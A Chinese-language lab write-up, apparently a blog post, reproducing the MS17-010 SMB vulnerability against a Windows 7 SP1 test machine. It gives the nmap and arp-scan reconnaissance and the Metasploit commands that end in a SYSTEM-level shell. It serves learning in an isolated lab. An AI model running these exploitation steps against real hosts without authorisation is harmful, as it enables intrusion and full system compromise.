MS17_010复现

完整的MS17_010漏洞复现过程,包括靶机搭建、信息收集、渗透测试等步骤,成功获取system权限。

靶机搭建

使用镜像

Windows7 SP1

Windows7 SP1镜像
图注:Windows7 SP1镜像

配置步骤

关闭防火墙

打开 控制面板->系统和安全->Windows防火墙,选择"启用或关闭 Windows 防火墙"

关闭防火墙
图注:关闭防火墙

开启服务

Server服务
Server服务
图注:Server服务
Workstation服务
Workstation服务
图注:Workstation服务

渗透测试

网络环境

将攻击机和靶机选用同一个网卡

信息收集

主机探测

arp-scan -l
主机探测
图注:主机探测

靶机ip地址为192.168.19.131

端口扫描

nmap -p- 192.168.19.131
端口扫描
图注:端口扫描

445端口开放

开始渗透

启动msf

msfconsole
启动msfconsole
图注:启动msfconsole

搜索ms17_010漏洞

search ms17_010
搜索ms17_010
图注:搜索ms17_010

选择并查看配置项

use 0
show options
查看配置项
图注:查看配置项

设置rhosts(靶机)

set rhosts 192.168.19.131
设置rhosts
图注:设置rhosts

设置监听地址

设置监听地址
图注:设置监听地址

检查连通性

check
检查连通性
图注:检查连通性

可以连通

运行

exploit或run
运行exploit
图注:运行exploit
成功连接
图注:成功连接

成功!!!

成功后操作

shell
chcp 65001
whoami
获取权限
图注:获取权限

取得了最高的system权限

文章评论